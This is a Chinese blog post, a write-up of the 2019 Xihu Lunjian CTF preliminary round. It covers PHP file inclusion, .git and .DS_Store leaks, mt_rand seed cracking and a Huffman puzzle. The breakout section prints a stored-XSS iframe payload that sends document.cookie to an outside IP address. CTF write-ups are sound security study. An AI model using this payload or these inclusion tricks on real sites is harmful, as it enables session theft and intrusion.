<!DOCTYPE html><html><head><meta name="generator" content="Hexo 3.8.0"><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="2019西湖论剑初赛复现"><meta name="keywords" content="Web,Crypto,Misc"><meta name="author" content="Gard3nia"><meta name="copyright" content="Gard3nia"><title>2019西湖论剑初赛复现 | Gard3nia's Blog</title><link rel="shortcut icon" href="/rea.jpg"><link rel="stylesheet" href="/css/index.css?version=1.5.6"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css?version=1.5.6"><link rel="dns-prefetch" href="https://cdn.staticfile.org"><link rel="dns-prefetch" href="https://cdn.bootcss.com"><link rel="dns-prefetch" href="https://creativecommons.org"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  copy: {
    success: 'Copy successfully',
    error: 'Copy error',
    noSupport: 'The browser does not support'
  }
} </script></head><body><canvas class="fireworks"></canvas><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar"><div class="toggle-sidebar-info text-center"><span data-toggle="Toggle article">Toggle site</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">Catalog</div><div class="sidebar-toc__progress"><span class="progress-notice">You've read</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#前言"><span class="toc-number">1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#正文"><span class="toc-number">2.</span> <span class="toc-text">正文</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Web"><span class="toc-number">2.1.</span> <span class="toc-text">Web</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#babyt3"><span class="toc-number">2.1.1.</span> <span class="toc-text">babyt3</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#猜猜flag是什么"><span class="toc-number">2.1.2.</span> <span class="toc-text">猜猜flag是什么</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#breakout"><span class="toc-number">2.1.3.</span> <span class="toc-text">breakout</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#构造XSS"><span class="toc-number">2.1.3.1.</span> <span class="toc-text">构造XSS</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Crypto"><span class="toc-number">2.2.</span> <span class="toc-text">Crypto</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#哈夫曼之谜"><span class="toc-number">2.2.1.</span> <span class="toc-text">哈夫曼之谜</span></a></li></ol></li></ol></li></ol></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="/img/avatar.png"></div><div class="author-info__name text-center">Gard3nia</div><div class="author-info__description text-center"></div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">Articles</span><span class="pull-right">30</span></a><a class="author-info-articles__tags article-meta" href="/tags"><span class="pull-left">Tags</span><span class="pull-right">16</span></a><a class="author-info-articles__categories article-meta" href="/categories"><span class="pull-left">Categories</span><span class="pull-right">8</span></a></div><hr><div class="author-info-links"><div class="author-info-links__title text-center">friendlinks</div><a class="author-info-links__name text-center" href="https://skysec.top">一叶飘零学长</a><a class="author-info-links__name text-center" href="https://0verwatch.top/">0verwatch</a><a class="author-info-links__name text-center" href="https://comydream.github.io">Source</a><a class="author-info-links__name text-center" href="http://chaosec.top/">Charles</a></div></div></div><div id="content-outer"><div id="top-container" style="background-image: url(https://s1.ax1x.com/2018/12/27/FRVGCQ.png)"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">Gard3nia's Blog</a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right menus"><a class="site-page" href="/">主页</a><a class="site-page" href="/archives">时间轴</a><a class="site-page" href="/tags">标签</a><a class="site-page" href="/categories">归档</a><a class="site-page" href="/about">简介</a></span></div><div id="post-info"><div id="post-title">2019西湖论剑初赛复现</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2019-04-11</time><span class="post-meta__separator">|</span><i class="fa fa-inbox post-meta__icon" aria-hidden="true"></i><a class="post-meta__categories" href="/categories/Writeup/">Writeup</a><div class="post-meta-wordcount"><span>Word count: </span><span class="word-count">789</span><span class="post-meta__separator">|</span><span>Reading time: 2 min</span></div></div></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>很遗憾没有和队友参加这一次西湖论剑初赛，作为萌新肯定是被砍得最惨的那个……但还是来复现一下web吧！<a id="more"></a></p>
<h1 id="正文"><a href="#正文" class="headerlink" title="正文"></a>正文</h1><h2 id="Web"><a href="#Web" class="headerlink" title="Web"></a>Web</h2><h3 id="babyt3"><a href="#babyt3" class="headerlink" title="babyt3"></a>babyt3</h3><p>打开网页就发现了思路，<code>include $_GET(&#39;file&#39;)</code>，文件包含？？？<del>按理说安恒的题不应该这么明显看出来思路，肯定是出现了点问题…</del></p>
<p><img src="https://s2.ax1x.com/2019/04/11/AH8G1P.png" alt="AH8G1P.png"></p>
<p>尝试使用php封装的协议读取一下<code>index.php</code>；成功……<del>WTF????</del></p>
<p><img src="https://s2.ax1x.com/2019/04/11/AHGHGn.png" alt="AHGHGn.png">base64一下：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$a = @$_GET[<span class="string">'file'</span>];</span><br><span class="line"><span class="keyword">if</span> (!$a) &#123;</span><br><span class="line">	$a = <span class="string">'./templates/index.html'</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">'include $_GET[\'file\']'</span>;</span><br><span class="line"><span class="keyword">if</span> (strpos(<span class="string">'flag'</span>,$a)!==<span class="keyword">false</span>) &#123;</span><br><span class="line">	<span class="keyword">die</span>(<span class="string">'nonono'</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">include</span> $a;</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line"></span><br><span class="line">&lt;!--hint: ZGlyLnBocA== --&gt;</span><br></pre></td></tr></table></figure>
<p>发现确实是文件包含没错了，要求GET的变量不能包含flag字符，hint解密为dir.php；那就直接读取dir.php；</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$a = @$_GET[<span class="string">'dir'</span>];</span><br><span class="line"><span class="keyword">if</span>(!$a)&#123;</span><br><span class="line">$a = <span class="string">'/tmp'</span>;</span><br><span class="line">&#125;</span><br><span class="line">var_dump(scandir($a));</span><br></pre></td></tr></table></figure>
<p>GET一个dir参数，打印出目录列表，那就直接读根目录即可；发现flag信息：</p>
<p><img src="https://s2.ax1x.com/2019/04/11/AHtjqf.png" alt="AHtjqf.png"></p>
<p>再返回首页继续用封装协议读文件即可：</p>
<p><img src="https://s2.ax1x.com/2019/04/11/AHUQAS.png" alt="AHUQAS.png"></p>
<p><img src="https://s2.ax1x.com/2019/04/11/AHUBh4.png" alt="AHUBh4.png"></p>
<p>不过试了一下直接<code>?file=/ffffflag_1s_Her4</code>也是可行的，应该是判断写的有问题…非预期解…</p>
<h3 id="猜猜flag是什么"><a href="#猜猜flag是什么" class="headerlink" title="猜猜flag是什么"></a>猜猜flag是什么</h3><p>没什么思路，直接扫后台，扫出.DS_store，应该对应的是MacOS的.DS_Store 文件泄漏</p>
<p><img src="https://s2.ax1x.com/2019/04/11/AHBkQJ.png" alt="AHBkQJ.png"></p>
<p>用exp脚本工具将目录下的东西下载下来</p>
<p><img src="https://s2.ax1x.com/2019/04/11/AHDZcQ.png" alt="AHDZcQ.png"></p>
<p>打开并没有发现什么有用的东西，都是一些套路…扫描<code>http://61.164.47.198:10002/e10adc3949ba59abbe56e057f20f883e</code></p>
<p>时发现.git泄露：</p>
<p><img src="https://s2.ax1x.com/2019/04/12/AbnCL9.png" alt="AbnCL9.png"></p>
<p>使用githack恢复源码：</p>
<p><img src="https://s2.ax1x.com/2019/04/11/AHrdMQ.png" alt="AHrdMQ.png"></p>
<p>发现压缩包是经过加密的，发现不仅给了压缩包，还给了一张图片，联想到zip明文攻击，攻击后得到hint：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">code is 9faedd5999937171912159d28b219d86</span><br><span class="line">well ok ur good...By the way, flag saved in flag/seed.txt</span><br></pre></td></tr></table></figure>
<p>访问<code>http://61.164.47.198:10002/?code=9faedd5999937171912159d28b219d86</code>得到伪随机数<strong>500853255</strong></p>
<p>使用c语言脚本工具php_mt_seed在kali下爆破得到3个seed：</p>
<p><img src="https://s2.ax1x.com/2019/04/12/Abn1ot.png" alt="Abn1ot.png"></p>
<p>第一个就是正确的seed：</p>
<p><img src="https://s2.ax1x.com/2019/04/12/AbnNQg.png" alt="AbnNQg.png"></p>
<p>参考链接:<a href="https://www.cnblogs.com/zaqzzz/p/9997855.html" target="_blank" rel="noopener">https://www.cnblogs.com/zaqzzz/p/9997855.html</a></p>
<h3 id="breakout"><a href="#breakout" class="headerlink" title="breakout"></a>breakout</h3><p>随手输入登录进去，发现第一个页面是一个留言功能，容易联想到XSS：</p>
<p><img src="https://s2.ax1x.com/2019/04/12/AqeXQg.png" alt="AqeXQg.png"></p>
<p>第二个页面，发现bug后，将页面的URL提交给管理员，管理员会携带cookie查看：</p>
<p><img src="https://s2.ax1x.com/2019/04/12/AqmAlF.png" alt="AqmAlF.png"></p>
<p>第三个页面：</p>
<p><img src="https://s2.ax1x.com/2019/04/12/Aqmem9.png" alt="Aqmem9.png"></p>
<p>看到第三个界面联想到命令执行，测试一下发现需要管理员身份，</p>
<p><img src="https://s2.ax1x.com/2019/04/12/AqmNTI.png" alt="AqmNTI.png"></p>
<p>这样的话，思路就出来了，大概就是用存储型xss，将存在xss的url发送给管理员形成xss盗取cookie，随后伪造管理员身份进行登录，命令执行；</p>
<h4 id="构造XSS"><a href="#构造XSS" class="headerlink" title="构造XSS"></a>构造XSS</h4><p>测试一下找到输出点：</p>
<p><img src="https://s2.ax1x.com/2019/04/12/Aqn2Ke.png" alt="Aqn2Ke.png"></p>
<p>fuzz一下，发现</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;alert(233);&lt;/script&gt;</span><br><span class="line">&lt;:)&gt;alert(233);</span><br></pre></td></tr></table></figure>
<p>基本的字符script都被替换掉了，测试一下<code>&lt;li&gt;2333&lt;/li&gt;</code>发现还是可用的</p>
<p><img src="https://s2.ax1x.com/2019/04/12/Aqulse.png" alt="Aqulse.png"></p>
<p>所以我们可以采取闭合<code>&lt;li&gt;</code>标签的方法来构造XSS，尝试unicode编码绕过：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;/li&gt;&lt;iframe src=&quot;java&amp;#115;cript:window.location.href=&apos;http://165.227.63.123:2335/?a=&apos;+document.cookie&quot;&gt;&lt;/iframe&gt;&lt;li&gt;</span><br></pre></td></tr></table></figure>
<p>不过一直没有打到cookie，在此记录一下思路……</p>
<h2 id="Crypto"><a href="#Crypto" class="headerlink" title="Crypto"></a>Crypto</h2><h3 id="哈夫曼之谜"><a href="#哈夫曼之谜" class="headerlink" title="哈夫曼之谜"></a>哈夫曼之谜</h3><p>手动解题：</p>
<p>d和5的编码不确定，有两种可能性，<del>手动复习哈夫曼树</del></p>
<p><img src="https://s2.ax1x.com/2019/04/12/AbvRxK.jpg" alt="AbvRxK.jpg"></p>
</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">Author: </span><span class="post-copyright-info"><a href="mailto:undefined">Gard3nia</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">Link: </span><span class="post-copyright-info"><a href="https://gardenia30.top/2019/04/11/西湖论剑复现/">https://gardenia30.top/2019/04/11/西湖论剑复现/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">Copyright Notice: </span><span class="post-copyright-info">All articles in this blog are licensed under <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> unless stating additionally.</span></div></div><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/Web/">Web</a><a class="post-meta__tags" href="/tags/Crypto/">Crypto</a><a class="post-meta__tags" href="/tags/Misc/">Misc</a></div><nav id="pagination"><div class="prev-post pull-left"><a href="/2019/04/18/Metasploit学习笔记-极光漏洞渗透/"><i class="fa fa-chevron-left">  </i><span>Metasploit学习笔记-极光漏洞渗透</span></a></div><div class="next-post pull-right"><a href="/2019/04/03/Sqli-Labs笔记-basic/"><span>Sqli-Labs通关笔记-basic</span><i class="fa fa-chevron-right"></i></a></div></nav></div></div><footer><div class="layout" id="footer"><div class="copyright">&copy;2018 - 2019 By Gard3nia</div><div class="framework-info"><span>Driven - </span><a href="http://hexo.io"><span>Hexo</span></a><span class="footer-separator">|</span><span>Theme - </span><a href="https://github.com/Molunerfinn/hexo-theme-melody"><span>Melody</span></a></div><div class="footer_custom_text">Just keep moving!</div><div class="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fa fa-file-o"></i><span id="busuanzi_value_page_pv"></span><span></span></span></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@latest/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-ui-pack@latest/velocity.ui.min.js"></script><script src="/js/utils.js?version=1.5.6"></script><script src="/js/fancybox.js?version=1.5.6"></script><script src="/js/sidebar.js?version=1.5.6"></script><script src="/js/copy.js?version=1.5.6"></script><script src="/js/fireworks.js?version=1.5.6"></script><script src="/js/transition.js?version=1.5.6"></script><script src="/js/scroll.js?version=1.5.6"></script><script src="/js/head.js?version=1.5.6"></script></body></html>